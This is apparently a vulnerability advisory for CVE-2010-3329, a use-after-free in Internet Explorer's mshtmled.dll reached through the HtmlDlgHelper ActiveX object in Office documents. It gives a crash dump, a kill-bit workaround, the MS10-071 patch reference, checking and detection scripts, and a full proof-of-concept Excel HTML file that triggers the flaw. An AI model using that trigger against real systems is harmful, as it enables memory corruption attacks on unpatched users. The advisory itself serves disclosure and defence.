BUGTRAQ ID: 43706
CVE ID: CVE-2010-3329
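Internet Explorer is the web browser bundled by default with the Windows operating system.
A memory corruption vulnerability exists in the way Windows instantiates the HtmlDlgHelper class object (CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b) in Office documents (such as .XLS and .DOC). The vulnerable module is mshtmled.dll in Internet Explorer; the vulnerability is triggered in mshtmled.dll when uninitialized memory is accessed after the destructor of the CHtmlDlgHelper class has been called. The following is the code segment where the vulnerability occurs: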
mshtmled!ReleaseInterface:
42b919c0 8bff mov edi,edi
42b919c2 55 push ebp
42b919c3 8bec mov ebp,esp
42b919c5 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0013d104=00310065
42b919c8 85c0 test eax,eax
42b919ca 7406 je mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]
42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065
42b919ce 50 push eax
42b919cf ff5108 call dword ptr [ecx+8] ds:0023:7d02029c=2a2c277a
eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b
Instruction Address: 0x000000002a2c277a
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
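Workaround:
To set the kill bit for the CLSID value {3050f4e1-98b5-11cf-bb82-00aa00bdce0b}, paste the following text into a text editor (such as WordPad) and save the file with the .reg file name extension.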
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]
"Compatibility Flags"=dword:00000400
Apply this .reg file to an individual system by double-clicking it.
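To confirm the workaround took effect, the key can be exported again and its flags checked. The following is an added example, not part of the original advisory: it parses .reg text and reports whether kill bit 0x400 is set on the CLSID as a subkey of ActiveX Compatibility. The sample inputs are constructed.

```python
import re

KILL_BIT = 0x400  # the dword the advisory writes to "Compatibility Flags"
CLSID = "{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}"  # HtmlDlgHelper, from the advisory
PARENT = r"hkey_local_machine\software\microsoft\internet explorer\activex compatibility"

def parse_reg(text):
    """Parse .reg text into {key path: {value name: raw data}}, names lower-cased."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None:
            m = re.match(r'"([^"]+)"\s*=\s*(.+)$', line)
            if m:
                current[m.group(1).lower()] = m.group(2).strip()
    return keys

def kill_bit_set(text, clsid=CLSID):
    """True only if the CLSID is a subkey of ActiveX Compatibility with bit 0x400 set."""
    values = parse_reg(text).get(PARENT + "\\" + clsid.lower())
    if values is None:
        return False
    m = re.fullmatch(r"dword:([0-9a-f]{8})", values.get("compatibility flags", ""), re.I)
    return bool(m) and bool(int(m.group(1), 16) & KILL_BIT)

# Constructed sample inputs (not captured from a real system).
HEADER = "Windows Registry Editor Version 5.00\n\n"
KEY = r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
APPLIED = HEADER + KEY + "\\" + CLSID + ']\n"Compatibility Flags"=dword:00000400\n'
CLEARED = HEADER + KEY + "\\" + CLSID + ']\n"Compatibility Flags"=dword:00000000\n'
# Separator missing before the CLSID: this names a different key, so the
# control is not blocked even though the flag value itself is correct.
NO_SEPARATOR = HEADER + KEY + CLSID + ']\n"Compatibility Flags"=dword:00000400\n'

if __name__ == "__main__":
    samples = [("applied", APPLIED), ("cleared", CLEARED), ("no separator", NO_SEPARATOR)]
    for name, sample in samples:
        print(f"{name}: kill bit set = {kill_bit_set(sample)}")
```

Files written by regedit in the Version 5.00 format are UTF-16, so decode them before passing the text to `kill_bit_set`.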
Vendor patch:
Microsoft has released a security bulletin (MS10-071) and a corresponding patch for this issue:
MS10-071: Cumulative Security Update for Internet Explorer (2360131)
Link: http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
x\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:LastAuthor>TEST</o:LastAuthor>
<o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>
<o:Version>10.6858</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<x:ExcelWorkbook>
<x:ExcelWorksheets>
<x:ExcelWorksheet>
<x:Name>test</x:Name>
<x:WorksheetOptions>
<x:CodeName>Sheet1</x:CodeName>
<x:Selected/>
<x:DoNotDisplayGridlines/>
<x:ProtectContents>False</x:ProtectContents>
<x:ProtectObjects>False</x:ProtectObjects>
<x:ProtectScenarios>False</x:ProtectScenarios>
</x:WorksheetOptions>
</x:ExcelWorksheet>
</x:ExcelWorksheets>
<x:WindowHeight>9345</x:WindowHeight>
<x:WindowWidth>13260</x:WindowWidth>
<x:WindowTopX>240</x:WindowTopX>
<x:WindowTopY>60</x:WindowTopY>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ProtectWindows>False</x:ProtectWindows>
</x:ExcelWorkbook>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body link=blue vlink=purple>
<table x:str border=0 cellpadding=0 cellspacing=0 width=64 style='border-collapse:
collapse;table-layout:fixed;width:48pt'>
<col width=64 style='width:48pt'>
<tr height=17 style='height:12.75pt'>
<td height=17 width=64 style='height:12.75pt;width:48pt' align=left
valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600"
o:spt="201" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter"/>
<v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"
o:connecttype="rect"/>
<o:lock v:ext="edit" shapetype="t"/>
</v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style='position:absolute;
margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'
strokecolor="windowText [64]" o:insetmode="auto">
<![if gte mso 9]><o:title=""/>
<![endif]><x:ClientData ObjectType="Pict">
<x:SizeWithCells/>
<x:CF>Pict</x:CF>
<x:AutoPict/>
</x:ClientData>
</v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;
position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;
height:17px'><![endif]>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
<![if !vml]></span><![endif]><span
style='mso-ignore:vglayout2'>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=17 width=64 style='height:12.75pt;width:48pt'></td>
</tr>
</table>
</span></td>
</tr>
<![if supportMisalignedColumns]>
<tr height=0 style='display:none'>
<td width=64 style='width:48pt'></td>
</tr>
<![endif]>
</table>
</body>
</html>
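The test document above instantiates the class through an `<object classid=...>` tag inside an HTML-format Excel file, which gives a simple marker for mail or file-share scanning. The following is an added detection example, not part of the original advisory; it assumes HTML-format Office documents only (binary .XLS/.DOC files embed objects differently), and the sample inputs are constructed.

```python
import re

HTMLDLGHELPER = "3050f4e1-98b5-11cf-bb82-00aa00bdce0b"  # CLSID from the advisory

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
CLASSID = re.compile(r"""\bclassid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})\}?""", re.I)
# <meta name=ProgId content=Excel.Sheet> marks the file as an Office HTML document.
PROGID = re.compile(
    r"""<meta\b[^>]*\bname\s*=\s*["']?ProgId["']?[^>]*\bcontent\s*=\s*["']?([\w.]+)""",
    re.I)

def scan(data):
    """Return one finding per <object> tag that instantiates HtmlDlgHelper."""
    # latin-1 maps every byte to a character, so decoding never fails.
    markup = data.decode("latin-1") if isinstance(data, bytes) else data
    progid = PROGID.search(markup)
    findings = []
    for tag in OBJECT_TAG.finditer(markup):
        m = CLASSID.search(tag.group(0))
        if m and m.group(1).lower() == HTMLDLGHELPER:
            findings.append({"offset": tag.start(),
                             "progid": progid.group(1) if progid else None,
                             "tag": tag.group(0)})
    return findings

# Constructed samples: one embeds the advisory's CLSID, one a placeholder CLSID.
FLAGGED = b"""<html><head><meta name=ProgId content=Excel.Sheet></head><body>
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>
</body></html>"""
BENIGN = b"""<html><head><meta name=ProgId content=Excel.Sheet></head><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
</body></html>"""

if __name__ == "__main__":
    for name, sample in [("flagged", FLAGGED), ("benign", BENIGN)]:
        for hit in scan(sample):
            print(f"{name}: offset {hit['offset']} progid {hit['progid']} {hit['tag']}")
```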